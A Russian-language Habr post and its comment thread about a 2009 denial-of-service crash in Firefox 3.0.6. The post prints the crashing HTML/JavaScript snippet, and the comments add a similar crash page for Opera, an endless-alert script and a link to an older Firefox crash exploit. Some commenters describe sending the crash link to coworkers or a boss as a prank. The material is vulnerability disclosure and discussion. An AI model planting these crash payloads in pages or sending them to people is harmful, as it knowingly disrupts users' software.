DoS атака Mozilla Firefox 3.0.6

    Firefox 3.0.6 подвержен DoS атаке из-за некорректной обработки определённого кода.
    Ждём обновлений…

    Пример:
    ВНИМАНИЕ!!! Пример кода приведён исключительно в целях ознакомления! Использовать его запрещено!
    <BODY onload="
    document.designMode='on';//string
    document.removeChild(document.firstChild);//object
    document.queryCommandState('BackColor');
    ">


    тест (аккуратно, браузер фф скорее всего упадёт)

    P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу

    upd: в комментах говорят, что с включённым NoScript всё живёт
    Поделиться публикацией

    Комментарии 91

      +44
      >> P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу
      еще как стоило. *потирает руки и злобно смеётся*
        0
        ну так на себе без кода не проверишь!
          0
          А где on-line пример? :)
            +1
            добавил в топик
            • НЛО прилетело и опубликовало эту надпись здесь
                –1
                угу, noscript спасает в этом случае
                  –1
                  под ubuntu c включенным noscript не падает, как только делаешь временно разрешить вылетает )
                    +7
                    а еще если браузер совсем не загружать, тоже не падает
                +1
                Для поддержания полноты информации пояснили вы что делает конкретно код. Я вод третью строчку первый раз вижу в глаза.
                  0
                  Минутное гугление привело на www.milw0rm.com/, но всё равно не понял что означает параметр 'BackColor'
                    +2
                    Ну тогда и новость можно не делать, если все нагуглить можно ;)
                      +1
                      :) Похоже браузер должен упасть от определения фонового цвета таким образом. Интересно, у кого-то он реально свалился?
                        +2
                        например, у меня, 3.0.3
                          +17
                          Ура я нашел быстрый способ закрывать свой ff, скорость — 3 секунды :)
                            0
                            У меня на правый верхний крестик быстрее почему то…
                              0
                              Происходит закрытие окна, процесс в это время все еще висит в памяти, и может висеть еще с минуту. А тут сразу процесс вылетает.
                                +1
                                Это критично?

                                Можно и комп выключать из розетки, быстрее будет
                                  +2
                                  Когда требуется перезапуск — неприятно. Да и мои ответ был шуткой.
                              +1
                              хех. воистину. 2-3 секунды уходит. делаем домен bezpalevaff.ru и там злобный код. идет начальство-открой страницу.=)
                                0
                                А если идет начальник, а вы нажали на крестик для закрытия окна — то начальник быстренько смотрит в процессы?

                                А вот для быстрого перезапуска — самое оно. Только, по-моему, во время перезапуска мозилла сохраняет настройки. А с этой багой — нет.
                                  0
                                  ну при нажатии крестика не факт, что закроется сразу даже само окно. а вдруг немного подвиснет? всяко бывает. а тут прям надежно так.
                              +1
                              У меня. Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6
                          0
                          я этого, к сожалению, не знаю…
                            0
                            Думаю msdn немного поможет в прояснении msdn.microsoft.com/en-us/library/ms533049(VS.85).aspx
                          –3
                          А новость откуда собственно?
                          Ясное дело, что хабрасообщество решит убрать этот код.
                          Во-первых, не стоит дразнить читателей журнала «Хакир», а во-вторых, какой вывод должно сделать хабрасообщество при просмотре этого кода?
                            +1
                            Я первый раз прочёл на www.securitylab.ru/poc/368700.php. А так много где заметки есть по этому поводу. На www.milw0rm.com/, например.

                            Если решит убрать, то конечно уберу, не вопрос.

                            Вывод? Что этот код может привести к падению браузера. Ну и что надо заботиться о своей безопасности
                              +1
                              какой вывод должно сделать хабрасообщество при просмотре этого кода?

                              То что не надо дереференсить нулевой указатель?
                              0
                              Что-то не падает…
                                +1
                                странно. лично у меня рухнул. выше в комментариях тоже отписывались о положительном результате
                                  +2
                                  Все нормально, успешно рухнул :)
                                  Я его просто в непустую страницу всунул в body.
                                  0
                                  А какая версия FF/OS у Вас?
                                  Есть ли аддоны типа Noscript?
                                  +3
                                  А причём тут DoS атака?
                                    +8
                                    ну потому что firefox отказывается_обслуживать
                                      –29
                                      для него это нормально ;)
                                      +6
                                      Denial of Service. Отказ в обслуживании.
                                        –1
                                        а по мне так это крэш браузера. Браузер же не обслуживает удалённых клиентов.
                                      +1
                                      > тест (аккуратно, браузер фф скорее всего упадёт)

                                      упал(
                                        +2
                                        здесь ключевое слово СКОРЕЕ ВСЕГО, т.к. падает он оочень быстро.
                                        +2
                                        3.1b2 тож падает =\
                                          +1
                                          тоже решил проверить, думал относится только к 3.0.* оказалось что передалось по наследству.
                                          0
                                          Упал. 3.0.6, Ubuntu.
                                            –1
                                            Устоял.
                                            Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009021207 GranParadiso/3.0.6
                                              –1
                                              С отключенным noscript рухнул.
                                              +5
                                              3.2a1pre «Minefield» — не подвержен.
                                                0
                                                Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox 3.1 Упал.
                                                  +2
                                                  3.1b3pre (ночная от 18 февраля) упал. а вот с 3.2a1pre (ночная от 22 февраля) все в порядке
                                                    –1
                                                    3.0.6 — WinXP — упал моментально :)
                                                      +4
                                                        0
                                                        хочется отметить, что судя по багзилле уязвимости 5 месяцев!
                                                          +5
                                                          мда…
                                                          начал понимать тех, кто ставит noscript, раньше считал это ппц дикостью
                                                        –1
                                                        Gentoo
                                                        www-client/mozilla-firefox (3.0.6@16.02.2009): Firefox Web Browser + Noscript
                                                        полет нормальный :D
                                                          0
                                                          Про код это Вы зря. Обычно, когда сообщают об уязвимости, просто говорят, что она есть.
                                                          Кстати, у мозиллы уже версия 3.0.7 в релиз-кандидатах с 20 февраля (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/)
                                                            0
                                                            Почти всегда приводят пример кода или готовый код эксплойта.
                                                            Какой смысл в информации о «просто уязвимости», когда нет возможности её «пощупать»?
                                                            0
                                                            упал. только ссылку можно убрать, там пустая страница. пришлось самому html клепать
                                                              0
                                                              зе зарепортили баг разработчикам? ))
                                                              –1
                                                              код работает — ФФ 3 упал
                                                              • НЛО прилетело и опубликовало эту надпись здесь
                                                                  +2
                                                                  кто то может код пояснить?
                                                                    –3
                                                                    {\rtf\pict\&&} ФФокапец. Как ни странно, но многие из моих знакомых сидят не на фоксе. Мелочь, а приятно.
                                                                      0
                                                                      Mozilla/5.0 (X11; U; Linux x86_64; be; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
                                                                      падает
                                                                      ФФ последнее время начинает разочаровывать, стал тормозной и не поворотливый.
                                                                        0
                                                                        По-моему, как раз наоборот он постепенно становится все шустрее и меньше жрет памяти.
                                                                        +1
                                                                        имхо, очевидно, что с noscript или отключенным яваскриптом все будет работать))
                                                                        кстати, а что этот код должен делать (кроме убийства фф)?
                                                                          0
                                                                          Спасибо, прислал всем сотрудникам ссылку вида a
                                                                          ФФ отвалился только у интернов.
                                                                            0
                                                                            Спасибо, закончу сегодня свой ночной интернет-серфинг необычным способом, а то как раз спать пора :)
                                                                              +3
                                                                              А вот и для оперы пряники:

                                                                              <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
                                                                              <html>
                                                                              <head>
                                                                              <title>SuperSelect</title>
                                                                                <style type="text/css">
                                                                                  optgroup { display: table-row }
                                                                                  option { display: table-cell }
                                                                                </style>

                                                                              </head>
                                                                              <body>
                                                                                <form>
                                                                                   <select>
                                                                                     <optgroup>
                                                                                       <option>1</option>
                                                                                       <option>2</option>
                                                                                     </optgroup>
                                                                                     <optgroup>
                                                                                       <option>32222</option>
                                                                                       <option>4</option>
                                                                                     </optgroup>
                                                                                   </select>
                                                                                 </form>
                                                                              </body>
                                                                              </html>


                                                                              * This source code was highlighted with Source Code Highlighter.
                                                                                –14
                                                                                Работает!!!

                                                                                Но в то время как Опера тоже глючна, она быстрее, безопаснее и показывает меньше рекламы, и работает бытсрее фаерфокса!!(Версия 3 — вообще тормоз)

                                                                                p.s. Будь проклят маркетинг и бизнес-планы, убивающие хороший код.
                                                                                  0
                                                                                  Зачем же так остро реагировать? Опера живет и процветает, постоянно выходят новые версии с новыми задумками и реализованными идеями. Так что никто её не убивает. А этот баг я уже засубмитил, и думаю не я один.
                                                                                  +1
                                                                                  • Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
                                                                                  • Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0


                                                                                  Падают. Интересно. :)
                                                                                  0
                                                                                  Ну вот вам на ff2. Не закрывают второй год.
                                                                                  myiworm.com/public/exploits/firefox2/firefox_2_0_0_9-denial_of_service_2.html
                                                                                    0
                                                                                    • НЛО прилетело и опубликовало эту надпись здесь
                                                                                        0
                                                                                        данный эксплоит был актуален с FF 2.0.0.9 до 2.0.0.20, и так и не был закрыт в течении полутора лет. Вот такая оперативность.
                                                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                                                      0
                                                                                      да падает…
                                                                                      причем под линухами процесс висит еще долго и kill убивать его не хочет…
                                                                                        +1
                                                                                        В мое время у команды kill была опция -9, хотя грохать GUI-процессы из ком. строки — изврат.
                                                                                        0
                                                                                        Работает конечно отлично, а какое может быть реально применение этой баги? Т.е как мне могут этим навредить кроме того, что у меня браузер закроется? Если я правильно понимаю именно по-этому в багзилле до сих пор статус стоит нормал…
                                                                                          0
                                                                                          На хабре этот код бы под кнопку написать. Как долго вы бы думали что это и почему так происходит?
                                                                                          Приминение может быть быть в сфере зления пользователя так сказать, это тоже не мало.
                                                                                            0
                                                                                            Все это так называемый киддинг… реальной экономической выгоды… финансовая выгода, к примеру, заставляет людей писать трояны =) и по-этому баги которые влекут за собой распространения троянов обозначают как «важно», а эта бага пустышка… ну закрылся бразуер и что? не один адекватный хакер не будет вешать это на взломанный ресурс.
                                                                                              0
                                                                                              Трояны для экономической выгоды. А обычные вирусы для чего? Для того же и этот код.
                                                                                          +1
                                                                                          Ну упал и упал. У меня вон фокс падает при открытии pdf. Вот это проблемка. А тут я даже сначало и не понял почему не работает, а потом вспомнил про Noscript. :)
                                                                                          Скрипты эт такая штука, что отказ в обслуживании можно сделать сотнями (тысяч) способов. Вот например
                                                                                          <script language=«Javascript»>
                                                                                          function bu(){ alert('BU'); bu(); };
                                                                                          bu();
                                                                                          </script>
                                                                                          Или это тоже считается эксплойтом и эксплуатирует какую-то уязвимость.
                                                                                            –1
                                                                                            Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.6) Gecko/2009020709 Fedora/3.0.6-1.0.140asp Firefox/3.0.6 рухнул…
                                                                                            *ушел ставить Noscript
                                                                                              0
                                                                                              SeaMonkey 2.0b1pre — не падает :)
                                                                                              (Noscript не стоит)
                                                                                                0
                                                                                                упал…
                                                                                                  +2
                                                                                                  Ну падает и падает, где собственно проблема? Данные пользователя можно прочитать — нет. Использовать уязвимость для построения ботнета — нет. Возможностей положить любой браузер корявым джаваскриптом куча. Чинить надо, как и много других багов, но приоритет явно на багах где есть проблемы с безопастностью.
                                                                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                      +5
                                                                                                      Firefox/13.3.7?
                                                                                                      • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                      0
                                                                                                      Хаха, думал фейк или пофиксили уже — слетело всё :)))

                                                                                                      Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                                                      Самое читаемое